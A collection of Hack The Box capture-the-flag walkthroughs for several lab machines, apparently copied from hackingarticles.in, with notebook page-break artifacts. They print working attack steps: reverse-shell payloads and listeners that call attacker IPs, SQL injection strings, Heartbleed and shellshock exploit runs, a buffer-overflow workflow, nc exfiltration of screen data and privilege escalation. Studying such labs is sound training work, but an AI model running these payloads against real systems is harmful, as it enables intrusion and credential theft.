Valentine

Wednesday, January 2, 2019 7:14 PM

Difficulty Level: Medium

Task: find user.txt and root.txt file on victim’s machine.
Steps involved:
• Port scanning and services detection
• Web server directory enumeration
• Discovery of hex encoded ssh key
• Decoding key
• Finding Passphrase
• Capturing user flag
• Capturing root flag
This lab has a static IP and IP of 10.10.10.79. So let’s start the CTF challenge with port
scanning.
1 nmap –A 10.10.10.79
From its scanning result we found port 22 and 80 are open for ssh and http services.

Walkthroughs 3 Page 1
Let’s enumerate the web service running on port 80. The below image could be a hint,
there is a heart and blood. Does it mean heartbleed? Could be! Let’s enumerate
further.

Walkthroughs 3 Page 2
further.

Let’s see what we can find by directory brute forcing:

1 dirb http://10.10.10.79
It put so many files but /dev looks more interesting so Lets browse
http://10.10.10.73/dev.

Walkthroughs 3 Page 3
http://10.10.10.73/dev.

Great we found some directories here. Let’s manually check these directories one by
one. The directory “dev” seems very interesting, There are two files as shown in the
below images.

Firstly I opened notes.txt file as shown in the below image, it seems there is some
encoding and decoding is involved.

Walkthroughs 3 Page 4
Then we opened another file hype_key and notice found encoded hex text, let’s convert
it into plain text and see if it makes any sense.

With help of burp we try to decode above hex into plain text as shown in the image. So
it’s a RSA private key, but it has space after each character, which needs to be fixed.

Walkthroughs 3 Page 5
After removing space using sed command, we get our key as shown in the image
below. Now all we need is a passphrase.
1 sed 's/ //g' key> sshkey
2 cat sshkey

Walkthroughs 3 Page 6
Checking if the HTTPS web service is vulnerable to heartbleed with help of nmap
script.
1 nmap –p 443 --script ssl-heartbleed 10.10.10.79
As expected the service is vulnerable to heartbleed, now let’s try to exploit it.

Walkthroughs 3 Page 7
Searching heartbleed exploit using searchsploit, and luckily found a python
exploit 32764.py in our local system.
1 searchsploit heartbleed

So I copied the python exploit on the desktop and run against target’s IP for exploiting
heartbleed.

Walkthroughs 3 Page 8
heartbleed.
1 python 32764.py 10.10.10.79
Wow! It worked perfectly as aspect.

As shown in the image above, there is a string. Let’s decode the string with the help of
following command, it may give the passphrase for ssh login.
1 echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 –d

Now let’s try to login SSH using the key and passphrase and after making successful
login we found user.txt file from inside /home/hype/Desktop
1 ssh –i key [email protected]
2 cd /home

Walkthroughs 3 Page 9
2 cd /home
3 ls
4 cd hype
5 ls
6 cd Desktop
7 ls
8 cat user.txt
So we logged in successfully and captured the user flag. Here 1st task is completed;
let’s find out root.txt to finish the 2nd task.

During further enumerating the history of commands on the system, we found some
interesting commands
1 cat .bash_history
2 tmux –S /.devs/dev_sess
Hmm!!! We got the root as shown in last image.

Now let’s grab the root.txt file quickly and finish this task. On running the below
command we got our Root flag.
1 cd /root
2 ls

Walkthroughs 3 Page 10
2 ls
3 cat root.txt
We finished both tasks successfully!!

Author: Utkarsh Pathak is an IT security r

From <https://www.hackingarticles.in/hack-the-box-valentine-walkthrough/>

Walkthroughs 3 Page 11
Ariekei
Wednesday, January 2, 2019 7:14 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.65 so let’s begin with nmap port enumeration.
1 nmap -sV -p- 10.10.10.65 --open
From given below image, you can observe we found port 22, 443 and 1022 are open on
target system.

As port 443 is running http server we open the target machine’s ip address in our
browser, we check the ssl certificate and find 2 domain
names: calvin.ariekei.htb and beehive.ariekei.htb.

Now when we open the website we get a webpage that has a message on it saying it
was maintenance.

Walkthroughs 3 Page 12
was maintenance.

Now we add the two domain names we found in the SSL certificate in /etc/hosts file for
further enumeration.

When we open “calvin.ariekei.htb” we get an error message saying the requested url
is not found.

Now when we open “beehive.ariekei.htb” we get the same under maintenance page as
we did the first time we opened the target’s IP address in our browser.

Walkthroughs 3 Page 13
we did the first time we opened the target’s IP address in our browser.

Now we use dirb to enumerate the directories running on target nginx server. We also
find that using either the IP address or the domain “beehive.arieki.htb” gives us
identical results.
1 dirb https://10.10.10.65/ -w

The dirb scan shows that we access /cgi-bin/stats directory on the target server, so we
open the link provided by the dirb scan. We find that it is running some shell script which
might be vulnerable to shellshock vulnerability.

Walkthroughs 3 Page 14
might be vulnerable to shellshock vulnerability.

When we try to exploit this page using shellshock, we get an emoji which persists
whenever we try to exploit it. This may mean there is web application firewall that
protects the server from this attack.

Now we use dirb to scan the other domain on the target server as it was showing

Walkthroughs 3 Page 15
Now we use dirb to scan the other domain on the target server as it was showing
different pages when we opened it in our browser.
1 dirb https://calvin.ariekei.htb/

Dirb scan shows us a directory named “upload/”, we open the link and find an upload
page.

Walkthroughs 3 Page 16
This page looks like it converts one type of image into another. This application maybe
vulnerable to ImageTragick vulnerability. So we create a mvg file to exploit this
vulnerability.

Now we upload the file on the server using the image-convert web application page we
find in the upload/ directory.

Walkthroughs 3 Page 17
find in the upload/ directory.

We setup our listener using netcat, as soon as we upload the file we get our reverse
shell.

We take a look at /proc/1/cgroup and find that we are inside a docker container.

Now we take a look at the mounted files, and find a directory called /common.

We open the “common/” directory and find a secret directory called “.secrets/”. We take
a look inside the content of the directory and find files named “bastion_key” and

Walkthroughs 3 Page 18
a look inside the content of the directory and find files named “bastion_key” and
“bastion_key.pub”.

We open the “bastion_key” file and we find a RSA key.

We copy the file into our system and save it as id_rsa, so that we can use it to login
using ssh.

Walkthroughs 3 Page 19
using ssh.

We change the permissions of the key, and login through ssh as root user using the
RSA key.
1 chmod 600 id_rsa
2 ssh [email protected] -p 1022 -i id_rsa

We again check if we are in docker container or not. We check the /proc/1/cgroup file
and find that we are still in docker container.

Walkthroughs 3 Page 20
We again go to the “common/” directory, inside /containers/blog-test/ we find a few files
and directories. One of the file contained a few bash commands and also root user
password.

Enumerating the rest of the directories, inside /common/containers/waf-live/ we find the

configuration files for the nginx server.

Walkthroughs 3 Page 21
configuration files for the nginx server.

We look at the “nginx.conf” file and find that waf-live is running on port 443 and routing
all traffic between the blog-test container and us. We also find that mod security is
acting as the web application firewall.
Now during our dirb scan we found a directory called /cgi-bin/stats/ which could be
vulnerable to shellshock but we were unable to exploit it because of the web application
firewall. As the waf-live is routing traffic between us and blog-test on port 443 it is
possible to exploit the shellshock vulnerability from inside the server.

We know the target ip to be 172.24.0.2 form the configuration file. We now need to find
the IP address to docker system we are in.

Walkthroughs 3 Page 22
the IP address to docker system we are in.

We use the shellshock exploit from here, and we got a reverse shell of the machine.
1 <span style="color: #000000;">python 34900.py payload=reverse rhost=172.24.0.2 lhost=
172.24.0.253 lport=1234 pages=/cgi-bin/stats</span>

The shell we got was not stable, so we use web_delivery module of the metasploit-
framework to get a stable reverse shell.
1 msf > use multi/script/web_delivery
2 msf exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_tcp
3 msf exploit(multi/script/web_delivery) > set lhost 10.10.14.8
4 msf exploit(multi/script/web_delivery) > set lport 4444
5 msf exploit(multi/script/web_delivery) > run

Walkthroughs 3 Page 23
We copy the command that was given in by the web_delivery script and pasted it in our
unstable shell and we got our stable reverse shell.

Now we spawn a TTY shell and use the password we found earlier in the Dockerfile to
login as root.

Unfortunately, we are still inside a container app but in this container, inside
/home/spanishdancer we find a file called “user.txt”. We take a look at the content of the
file and find our first flag.

Walkthroughs 3 Page 24
file and find our first flag.

We search for hidden directories and find a directory called “.ssh” we go inside the
directory and find three files authorized_keys, id_rsa and id_rsa.pub.

We take a look at the content of id_rsa and find a RSA key.

Walkthroughs 3 Page 25
We copy the RSA key into our system and save it as key.txt so that we can use this to
login through ssh.

Walkthroughs 3 Page 26
When we try to login through ssh using this key, we are asked for a passphrase. So we
use john the ripper to crack the passphrase. We use the default wordlist of johntheripper
and find the passphrase to be “purple1”.
1 ssh2john key.txt > hash_key.txt
2 john hash_key.txt

After we get the passphrase we change the permission of RSA key file and login as
user spanishdancer as it was inside the spanishdancer’s home directory.
1 chmod 600 key.txt
2 ssh -i key.txt [email protected]

Walkthroughs 3 Page 27
Now when we run the id command we find that we are a member of docker group.
Some containers have a dedicated group to allow unprivileged users to manage their
containers without having to escalate their privileges.

To exploit this vulnerability, we first need to check the docker images that are available.
docker images

We find that bash image is available to us, so we use this to create a new image and
mount the root/ directory of the host inside a folder called /hack. After we run the docker
image we go to /hack/root and find a file called “root.txt”. When we open the file we find
our final flag.
1 docker run -v /:/hack -i -t bash

Author: Sayantan

From <https://www.hackingarticles.in/hack-the-box-challenge-ariekei-walkthrough/>

Walkthroughs 3 Page 28
Enterprises
Wednesday, January 2, 2019 7:15 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.61 so let’s begin with nmap port enumeration.
1 nmap -sV 10.10.10.61
From given below image, you can observe we found port 22, 80, 443 and 80 are open
on target system.

As port 80 is running http server we open the target machine’s ip address in our
browser, and find a website that is running on wordpress.

As port 8080 is also running http server we open the target machine’s ip address in our

Walkthroughs 3 Page 29
As port 8080 is also running http server we open the target machine’s ip address in our
browser, and find a website that is not made on wordpress.

When we try to open the wordpress admin page but are redirected to domain called
“enterprise.htb”. We enter the domain name in /etc/hosts file.

Now when we open wp-admin, we are able to get the login page.

Walkthroughs 3 Page 30
Now when we open wp-admin, we are able to get the login page.

We run dirb on port 80 to enumerate the directories and find a directory called /files.
1 dirb http://10.10.10.61

Walkthroughs 3 Page 31
We open the files/ directory, and find a zip file.

Walkthroughs 3 Page 32
We open the files/ directory, and find a zip file.

We download the zip file in our system and unzip it. After unzipping it we find 3 php
files.

We take a look at the content of the files and it looks like there might be plugin called
lcars that is being used by the wordpress site and by the looks of the code it is possible
that is vulnerable to SQL-injection.

Walkthroughs 3 Page 33
Now when we open it we get a php error message, we now know that this plugin is
vulnerable to SQL-injection.

We use sqlmap to dump the database and found a message with a few passwords. We
also find that there is a joomla database we try to dump it and find a
username geordi.la.forge.

Walkthroughs 3 Page 34
username geordi.la.forge.

Now we use one of these passwords to login into wordpress. On the webpage we see
that there are has been posts made by user william.riker. So we use
credentials william.riker:u*Z14ru0p#ttj83zS6 to login into wordpress control panel.

Now we change the 404.php template with our payload to get reverse shell on the
machine. First we are going to create our payload using msfvenom.
1 msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 –f raw

Walkthroughs 3 Page 35
Now we are going to setup our listener using metasploit.
1 msf > use exploit/multi/handler
2 msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
3 msf exploit(multi/handler) > set lhost 10.10.14.25
4 msf exploit(multi/handler) > set lport 4444
5 msf exploit(multi/handler) > run

After replacing the 404.php code with our payload, we open the 404.php page in our
browser.

Walkthroughs 3 Page 36
As soon as we open it we get our reverse shell.

After getting our reverse shell we find that we are actually in a container app and we
find the machine has 2 network card.

Now we find all the ip’s in the subnet of the container.

Now we create another shell using msfvenom to upload it into the joomla site on port
8080.

Now we background our session and change the lport according to our payload.
1 meterpreter > background
2 msf exploit(multi/handler) > set lport 4455
3 msf exploit(multi/handler) > run

Walkthroughs 3 Page 37
We are first going to login into the joomla site, using
credentials, geordi.la.forge:ZD3YxfnSjezg67JZ and upload our shell code.

As soon as we open the page we get our reverse shell.

After getting into the joomla container, we find that we have common file called
/var/www/html/files.

We create another php payload using msfvenom to upload this shell into
/var/www/html/files directory.
1 msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw >
shell1.php

Walkthroughs 3 Page 38
We go to /var/www/html/files directory and upload the shell using meterpreter.

Now we background our current session and change the lport according to our new
payload.
1 meterpreter > background
2 msf exploit(multi/handler) > set lport 5555
3 msf exploit(multi/handler) > run

When we go to /files directory we find that our shell has been uploaded.

As soon as we click on the payload we get our reverse shell.

After getting the reverse shell on the main machine instead of container we try to find

Walkthroughs 3 Page 39
After getting the reverse shell on the main machine instead of container we try to find
files with suid bit set.
1 find / -perm -4000 2>/dev/null

We find a file called lcars, we find that it has been running on port 32812.

Walkthroughs 3 Page 40
We find a file called lcars, we find that it has been running on port 32812.

When we connect with it using netcat we find that it asks for access code.

We run the file on the target machine using ltrace to find the access code for this binary.

Walkthroughs 3 Page 41
We find that when we pass a it gets compared to a string called pircarda1. We use this
to login into the binary.

Walkthroughs 3 Page 42
We are able to access the file using this binary now we try to find this program is
vulnerable to buffer overflow. We open the file using gdb to read the assembly code.

Walkthroughs 3 Page 43
Now create 500 byte long string using pattern_create.rb script to find the EIP offset.
1 ./pattern_create.rb -l 500

After searching all the options we find that option number 4 was vulnerable to buffer
overflow.

Walkthroughs 3 Page 44
overflow.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an

offset of 212. So we need to write 212 characters and then write the address of the
instructions we want to be executed.
1 ./pattern_offset -q 31684130 -l 500

Now when we try to insert shellcode into the buffer but we were unable to execute it
because of DEP. It prevents code from being executed in the stack. Now we are going
to do a ret2libc attack to execute a process already present in the process’ executable
memory. We go into the target machine and find ASLR in enabled so we have to brute
force the address. Now we find the address of system, exit and /bin/sh.
1 gdb /bin/lcars
2 (gdb) b main
3 (gdb) run
4 (gdb) p system
5 (gdb) find 0xf7e0bd10, +9999999, "/bin/sh"
6 (gdb) p exit

We create an exploit which can be found here. As soon as we run the exploit we get our

Walkthroughs 3 Page 45
 We create an exploit which can be found here. As soon as we run the exploit we get our
reverse shell as root user. We go to /root directory and find a file called “root.txt”. When
we open it we find our 1st flag. We then go to /home directory inside we find another
directory called jeanlucpicard/. Inside /home/jeanlucpicard we find a file called “user.txt”,
we open it and find our final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Share this:
• Click to share on Twitter (Opens in new window)
• Click to share on Facebook (Opens in new window)
• Click to share on Google+ (Opens in new window)
Like this:

From <https://www.hackingarticles.in/hack-the-box-challenge-enterprises-walkthrough/>

Walkthroughs 3 Page 46
Flalafel
Wednesday, January 2, 2019 7:15 PM

Level: Hard
Task: find user.txt & root.txt file on victim’s machine
Since these labs are online available therefore they have static IP and its IP is
10.10.10.73 so let’s begin with nmap port enumeration.
1 nmap –A 10.10.10.73
From its scanning result we found port 22 and 80 are open for ssh and http services.

So we explored target IP through the web browser and it put up a login page shown.

Walkthroughs 3 Page 47
When I didn’t found any remarkable things then I used Dirbuster for directory brute force
attack. It put so many files but /cyberlaw.txt looks more interesting so I browsed
http://10.10.10.73/cyber.txt and put a message in front of me.

By reading this message I conclude that there is an admin account and which is facing
major security issue and an attacker can easily take over the website using image
upload feature. Moreover there is some hint on URL filter.

Walkthroughs 3 Page 48
upload feature. Moreover there is some hint on URL filter.

Then we try sql injection on the login form but it gave an error “Wrong Identification:
admin”

Then we make more efforts for sql injection by using SQLMAP and used “Wrong
identification” as string to be passed at the time of login.
1 sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong
identification" --dbs --batch

Walkthroughs 3 Page 49
As result it dumps the database name “falafel” now let’s extract the whole database
information.

1 sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong

2 identification" -D falafel --tables –batch
3
sqlmap -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong
identification" -D falafel -T users --dump --batch
So we got users tables from inside it and it has username and password as shown.

As you can observe that the password hash for user admin is started with 0 and I don’t
know much about this type of hash, so we look in the Google and notice link for Magic

Walkthroughs 3 Page 50
know much about this type of hash, so we look in the Google and notice link for Magic
hashes.

As you can observe the highlighted md5 hash for 32 bit string is same as
above……………………….

Walkthroughs 3 Page 51
With help of following credential we login into admin dashboard and move to upload
options.
1 Username: admin
2 Password: 240610708

Here we are trying to upload a php file named shell.php but it put an error “Bad
extension “as shown
Thereafter we renamed it as shell.php.png and again try to upload.

Walkthroughs 3 Page 52
Thereafter we renamed it as shell.php.png and again try to upload.

Ohh! Yes, the file with .png extension get uploaded successfully
inside /var/www/html/uploads hence we can to upload a malicious php file or any php
backdoor with .png extension.

Walkthroughs 3 Page 53
Let’s create a PHP payload for uploading into the web site. We have to use msfvenom
command for generating PHP backdoor.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw
Now copy the code from *<?php….die(); and paste in a text file then as
1 rajjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj.php.png
(240 character) also start multi handler in a new terminal.

Let me make it clear to you, here the author has applied filter for identifying 240
character file which means your file name must contain 240 characters including
extension.

Walkthroughs 3 Page 54
As shown in the given image the PHP file is uploaded successfully
inside /var/www/html/uploads.

Let execute it in the URL for obtaining reverse shell at metasploit.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by
exploiting multi handler.
1 msf use exploit/multi/handler
2 msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
3 msf exploit(multi/handler) set lhost 10.10.14.25
4 msf exploit(multi/handler) set lport 4444
5 msf exploit(multi/handler) exploit
From given below image you can observe Meterpreter session 1. But the task is not
finished yet, still, we need to penetrate more for privilege escalation. Further, we open
passwd file and notice two system username i.e. yossi and moshe.
Meterpreter> cat /etc/pasword

Walkthroughs 3 Page 55
After making some more inspection we found a file connection.php from
inside /var/www/html and receive database credential from inside it.
1 meterpreter> cd /var/www/html
2 meterpreter> ls
3 meterpreter> cat /connection.php
This is mysql configuration file for mysql where username is moshe and password
is falafelIsReallyTasty

Walkthroughs 3 Page 56
is falafelIsReallyTasty

With help of above credential we are trying to ssh login and after making successful
login we found user.txt file from inside /home/moshe
1 python -c "import pty;pty.spawn(‘/bin/bash’)"
2 ssh [email protected]
3 cd /home
4 cd moshe
5 cat user.txt

Walkthroughs 3 Page 57
After some more penetration, we enumerated the groups for user moshe and found that
the user is in the video group. When we found uses as the member of video group then
for post exploitation we need check frame-buffer device. Because this can lead a local
user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to
escalate their privileges on the system.
Let’s have the contents of /dev/fb0 with help of cat command to capture the frambuffer
raw data inside /tmp directory as scree.raw
1 groups
2 cat /dev/fb0 > /tmp/screen.raw
3 cd /tmp
4 ls
5 nc 10.10.14.25 5555 < screen.raw
So we have captured the raw data inside /tmp, now you need to take the raw image and
convert it to a standard image format say .png but we before that we need to find t the
size, use the following command which will print the dimension……………..
1 cat /sys/class/graphics/fb0/virtual_size

Walkthroughs 3 Page 58
Now enter the following command to convert raw data into a .png image format
1 ./iraw2png.pl 1176 885 < screen.raw > screen.png

Then we opened screen.png and got following image which was showing
password: MoshePlzStopHackingMe! for user Yossi.

With help of above enumerated credential we have made SSH login successfully and
then run following command for getting SSH RSA key.
1 df
2 debugfs /dev/sda1
3 cat /root/.ssh/id_rsa
Now copy the RSA key in a text file and named as key in your local machine. Also give
permission 600 to it.

Walkthroughs 3 Page 59
Now let’s connect to ssh once again through above RSA file as given below:
1 ssh -i key [email protected]
2 ls
3 cat root.txt

Walkthroughs 3 Page 60
 3 cat root.txt

Author: AArti Sin

From <https://www.hackingarticles.in/hack-the-box-challenge-falafel-walkthrough/>

Walkthroughs 3 Page 61
Charon
Wednesday, January 2, 2019 7:15 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.31 so let’s begin with nmap port enumeration.
1 nmap -sV 10.10.10.31

From given below image, you can observe we found port 22 and 80 are open on target
system.
As port 80 is running http server we open the target machine’s ip address in our
browser.

Walkthroughs 3 Page 62
We run dirbuster on port 80, which reveals a directory entitled “cmsdata/”.

We open the link, and are presented with a login page.

We don’t find anything on the login page, so we go to forgot password link.

Walkthroughs 3 Page 63
We don’t find anything on the login page, so we go to forgot password link.

We capture the request of the page using burpsuite, and send it to repeater.

After sending the request to repeater, we try to enumerate if the site is vulnerable to
SQL-injection. As soon as we add a quote at the end of our email id we get a database
error.

Walkthroughs 3 Page 64
error.

Now to confirm that the site is vulnerable to SQL-injection we use “– – “to comment the
query and remove the error.

Now as we know the site is vulnerable to SQL injection, we try to exploit it. First we find
the number of columns, to check the number of columns we use “ORDER BY”
command to find the number of columns in the table. After find the number of columns
we use “UNION SELECT” command to give the output column names with the
respective numbers. As UNION and union is blacklisted, we use UNion for SQL-
injection.
‘UNion SELECT 1,2,3,4 — –

Walkthroughs 3 Page 65
‘UNion SELECT 1,2,3,4 — –

We couldn’t run any commands in columns, but when we pass a string in column 4, we
successfully ran our query.

Now we know how bypass the security using string, we first find the name of the
database
1 ' UNion select 1,2,3,concat(database(), "@who.ami") -- -

After finding the name of the database we find the table name in the database.
1 ' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables
where table_schema="supercms" limit 1,1 -- -

Walkthroughs 3 Page 66
Enumerating the tables in the database; we find two tables, one called license and
another one called operators.
1 ' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables
where table_schema="supercms" limit 2,1 -- -

After getting the names of the tables, we enumerate the columns. The license table
doesn’t have any interesting columns but in the “operators” table we find a column
called “__username_”.
1 ' UNion select 1,2,3,concat(column_name, "@who.ami") FROM
information_schema.columns where table_name="operators" limit 1,1 -- -

After getting the “__username_” column we enumerate further and get a column called
“__password_”.
1 ' UNion select 1,2,3,concat(column_name, "@who.ami") FROM
information_schema.columns where table_name="operators" limit 2,1 -- -

Walkthroughs 3 Page 67
 information_schema.columns where table_name="operators" limit 2,1 -- -

Now we dump the column name “__username_”.

1 ' UNion select 1,2,3,concat(__username_, "@who.ami") FROM operators limit 1,1 -- -

Now we dump the column name “__password_” for the username = “super_cms_adm”.
1 ' UNion select 1,2,3,concat(__password_, “@who.ami”) FROM operators limit 1,1 -- -

When we dump the “__password_” column we get a hash. We use hashkiller.co.uk to

crack the password.

Now we got the credentials for the supercms login page, supercms:tamarro.

Walkthroughs 3 Page 68
Now we got the credentials for the supercms login page, supercms:tamarro.

Now login using the above credentials, we were able to get a page where there is an
option for uploading image.

Now we open the link and find an upload page.

Walkthroughs 3 Page 69
We take a look at the source page and find a base64 encoded string.

When we decode it we find a string called “testfile1”. It is possible that there is hidden
field with this name.

Now we create a php payload using msfvenom, so that we can upload our php shell.

Walkthroughs 3 Page 70
Now we create a php payload using msfvenom, so that we can upload our php shell.
1 msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.7 lport=4444 -f raw

We capture the upload request and create a new field and add “file.php”.

Now we get the link the location of the file we just uploaded in /images/.

Walkthroughs 3 Page 71
Before running our shell, we setup our listener using metasploit.
1 msf > use exploit/multi/handler
2 msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
3 msf exploit(multi/handler) > set lhost 10.10.14.7
4 msf exploit(multi/handler) > set lport 4444
5 msf exploit(multi/handler) > run

As soon as we open the link to our shell, we get our reverse shell.
meterpreter > sysinfo

Now enumerating through the system we find an encrytpted file and a public key inside
/home/decoder directory.

Walkthroughs 3 Page 72
We download both the files into our system.
1 meterpreter > download decoder.pub /root/Desktop
2 meterpreter > download pass.crypt /root/Desktop

Now we decode the encrypted file using public key with the RsaCtfTool.
1 ./RsaCtfTool.py --publickey /root/Desktop/decoder.pub –uncipherfile
/root/Desktop/pass.crypt

We use ssh to login using the credentials, decoder:nevermindthebollocks.

1 ssh [email protected]

Walkthroughs 3 Page 73
After logging in we find a file called user.txt, we open the file and find our first flag.

Now we find the files with SUID bit set and find a file called supershell in /usr/local/bin/
directory.
1 find / -perm -4000 2>/dev/null

Walkthroughs 3 Page 74
When we run the binary we find that we can run any shell command using this binary.
We use this to open root.txt inside /root/ directory. When we open root.txt we find our
final flag.
1 supershell "/bin/ls$
2 > cat /root/root.txt"

Author: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Share this:

From <https://www.hackingarticles.in/hack-the-box-challenge-charon-walkthrough/>

Walkthroughs 3 Page 75
Jail
Wednesday, January 2, 2019 7:15 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense
is 10.10.10.34 so let’s begin with nmap port enumeration.
1 nmap -sV –p- 10.10.10.34 --open

From given below image, you can observe we found port 22 and 80 are open on target
system.
As port 80 is running http server we open the target machine’s ip address in our
browser, and find an ascii art of prison cell on the webpage.

Walkthroughs 3 Page 76
We run dirbuster on port 80, which reveals a directory entitled jailuser/, with a folder
called dev/ inside the directory.

Inside the folder we see three files; a binary file, a c-program, and a bash script.

We open the c-program and find that it is a program for some kind of authentication. We
also find that it uses strcpy function for the variable password.

Walkthroughs 3 Page 77
We download the rest of the files, in the bash script there are just a few commands for a
service called jail and by checking the jail binary we find that it is an ELF file.

Now we give the binary executable permissions and run the binary.

We check netstat and find that it opens up a port 7411. We check the nmap scan and
find that port 7411 is open in the target machine.

Walkthroughs 3 Page 78
find that port 7411 is open in the target machine.

Now we open the binary in gdb to look at the assembly code. The binary works by
forking itself to each server call, so in the event of a crash the primary process will still
run. We use the command below in gdb to make the process debug in forked process.
1 gdb -q jail
2 (gdb) set follow-fork-mode child
3 (gdb) set detach-on-fork off
4 (gdb) run

First we create a 50 bytes long string to find the EIP offset using patter_create script.
./pattern_create –l 50

Now we connect to the binary running on our system using netcat. We check the c
program we found earlier to find the functions we need to use.
We know from the c-program that there is a strcpy function that copies the content of a
variable called password to a variable called username. Now we use the pattern we
created earlier and send it as password variable. We use the DEBUG function of the
binary to get the address of the stack pointer.
1 nc localhost 7411
2 USER admin
3 DEBUG
4 PASS {pattern}

As soon as we pass the string we get a segmentation fault and find that the EIP register
was overwritten with 0x62413961.
Walkthroughs 3 Page 79
was overwritten with 0x62413961.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an

offset of28. So we need to write 28 characters and then write the address of the
instructions we want to be executed.
1 ./pattern_offset.rb -q 62413961 -l 50

The off-set is 28 now we can proceed to create our python exploit using the available
data to gain a shell. You can download the exploit used in the machine from here. After
running the exploit we get a shell as user “nobody”.

Now for privilege escalation, we know that the machine is running NFS share we try to
exploit it. We first find the shared folders of the target machine.
showmount -e 10.10.10.34

After finding the shared folders we mount them locally. After mounting the shared folder
we find that only root user has read, write and execute permissions but a user with GID
1000 can write and execute files inside the folder.

So we create a user with GID 1000, so that we can upload our shell to exploit this weak
permission vulnerability.

Walkthroughs 3 Page 80
permission vulnerability.

We login as user frank and create a c-program inside the shared folder that can set the
real and effective user id to be 1000 of the calling the process.

Then we compile the program set the suid bit, so that we can spawn a shell with EUID
1000.

Now we go back to our reverse shell and run the binary that we just created. As soon as
we run binary we spawn a shell as user “frank”.

We spawn a TTY shell and take a look at the sudoers list. We find that we can open
jail.c file in /var/www/html/jailuser with rvim as user adm with no password.
1 python -c "import pty;pty.spawn(‘/bin/bash’)"
2 sudo -l

Walkthroughs 3 Page 81
Before running the command we find in the sudoers list, first we go to /home/frank
directory and find a file called “user.txt”. We take a look at the content of the file and find
our first flag.

Now we run the 2nd command we find in the sudoers list. Now we use rvim to spawn a
shell, as rvim is running as user adm when we spawn a shell we will get a shell as user
adm.

Inside adm’s home directory we find a hidden folder called “.keys”. We go inside the
directory and find one rar file called “keys.rar”, and one text file called “note.txt”.

We take a look at the content of note.txt file and find a hint for a password that states
that the password would be user Frank’s last name followed by 4 digits and a symbol.

Walkthroughs 3 Page 82
Now when we try to look for hidden directories, we find another folder called “.local”, we
go inside that directory and find a hidden file called “.frank”.

We open the file and find it that the content of the file is encrypted.

We use the site https://quipqiup.com and find the decrypted text; it was related to
someone escaping Alcatraz.

Walkthroughs 3 Page 83
someone escaping Alcatraz.

Now we want to send keys.rar file from the target machine to our system. We first
convert the content of keys.rar to base64 enoding, so that there are no bad characters.

Now we recreate the file by decoding the string in our local system.

When we try to extract the rar file we are asked for a password.
unrar x keys.rar

Walkthroughs 3 Page 84
Now from the earlier hint we try to google search “frank Alcatraz” and find that there was
a guy called Frank Miller who escaped Alcatraz prison in 1962.

We know that there was a message from the administrator to frank that his password is
his last name followed by 4 digits and 1 symbol. We use crunch to create a dictionary
with this information, we assume the number to be 1962 as it was the year Frank Miller
escaped and it fits the 4 digit number in his password.
1 crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@
After creating a wordlist, we use rar2john utility to convert keys.rar into a format suitable
for use with john the ripper.
1 rar2john keys.rar > jail

Walkthroughs 3 Page 85
We find the password to “Morris1962!” after we ran john the ripper to find the password
for the rar file using the word list we created using crunch.

Now we extract the file using the password we find earlier and find a public key.

We use rsactftool to convert the public key into private key so that we can use this to
login through ssh. After getting the private key; we change the permission of the private
key to read write for owner only. You can download the RsaCtfTool here.
1 python RsaCtfTool.py --publickey /root/rootauthorizedsshkey.pub –private > /root/id_rsa

We use the ssh private key to login into the target machine; once we connected through
ssh we were login as root user we check the content for home directory of root and find
a file called “root.txt”. We check inside the file and find our second and final flag.
1 ssh -i id_rsa 10.10.10.34

Walkthroughs 3 Page 86
 Author: Sayantan Bera is a technical writer at hacking articles and cyber security
enthusiast. Contact Here
Share this:
• Click to share on Twitter (Opens in new window)
• Click to share on Facebook (Opens in new window)
• Click to share on Google+ (Opens in new window)
Like this:

From <https://www.hackingarticles.in/hack-the-box-challenge-jail-walkthrough/>

Walkthroughs 3 Page 87
Nibble
